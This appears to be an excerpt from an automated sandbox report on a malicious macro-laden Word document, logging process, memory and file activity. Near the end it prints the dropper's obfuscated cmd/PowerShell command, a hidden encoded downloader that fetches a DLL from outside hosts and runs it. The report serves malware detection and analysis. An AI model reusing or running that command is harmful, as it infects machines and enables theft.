                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Lahhvjcxlgt\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100189F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100056B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100106C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100142E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100094EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100199A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100173C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100177C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100193C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100137F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B3FE
                      Source: ARCHIVOFile-20-012021.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Bcur5699z4d, Function Document_open
                      Source: ARCHIVOFile-20-012021.docOLE indicator, VBA macros: true
                      Source: ARCHIVOFile-20-012021.docOLE indicator application name: unknown
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@32/14@6/100
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$CHIVOFile-20-012021.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF1A.tmpJump to behavior
                      Source: ARCHIVOFile-20-012021.docOLE indicator, Word Document stream: true
                      Source: ARCHIVOFile-20-012021.docOLE document summary: title field not present or empty
                      Source: ARCHIVOFile-20-012021.docOLE document summary: author field not present or empty
                      Source: ARCHIVOFile-20-012021.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ........................................ .A.......A.....................H...............#...............................h.......5kU.............
                      Source: C:\Windows\System32\msg.exeConsole Write: ................(...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........k.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;@.j......................{.............}..v....X.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;@.j..... {...............{.............}..v............0.................k.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................C.j......n...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.i......................C.j......k...............{.............}..v....H.......0.................k.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............KC.j......................{.............}..v....p.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............KC.j..... {...............{.............}..v............0...............h.k.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j.....Mk...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j....P.................{.............}..v............0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j.....Mk...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j....P.................{.............}..v............0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j.....Mk...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....P.................{.............}..v............0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0...............8Jk.....(.......(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......................{.............}..v.... .......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.8.4.............}..v....0.......0...............8Jk.....$.......(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h ......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0'......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....'................{.............}..v....h(......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0/......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j...../................{.............}..v....h0......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....07......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....7................{.............}..v....h8......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0?......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....?................{.............}..v....h@......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....Mk...............{.............}..v....0G......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....G................{.............}..v....hH......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....Mk...............{.............}..v....0O......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....O................{.............}..v....hP......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....Mk...............{.............}..v....0W......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....W................{.............}..v....hX......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.....Mk...............{.............}..v....0_......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....._................{.............}..v....h`......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....Mk...............{.............}..v....0g......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....g................{.............}..v....hh......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....Mk...............{.............}..v....0o......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....o................{.............}..v....hp......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....Mk...............{.............}..v....0w......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....w................{.............}..v....hx......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....8.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....h.......0.......................r.......(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................{.............}..v............0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j.....Mk...............{.............}..v....0.......0...............8Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................~.j.....(................{.............}..v......".....0.................k.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................~.j.....(................{.............}..v....@S".....0.................k.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: ARCHIVOFile-20-012021.docVirustotal: Detection: 48%
                      Source: ARCHIVOFile-20-012021.docReversingLabs: Detection: 50%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
